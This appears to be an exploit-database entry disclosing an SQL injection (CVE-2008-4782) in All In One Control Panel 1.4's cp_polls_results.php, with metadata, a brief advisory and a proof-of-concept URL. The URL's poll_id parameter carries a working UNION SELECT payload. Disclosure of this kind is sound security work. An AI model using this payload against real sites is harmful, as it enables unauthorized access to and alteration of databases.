All In One 1.4 Control Panel - 'cp_polls_results.php' SQL Injection
Author: ExSploiters
type: webapps
platform: php
port:
date_added: 2008-10-27
date_updated: 2014-03-26
verified: 1
codes: CVE-2008-4782;OSVDB-49438
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/31949/info
All In One Control Panel (AIOCP) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AIOCP 1.4 is vulnerable; other versions may also be affected.
http://www.example.com/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--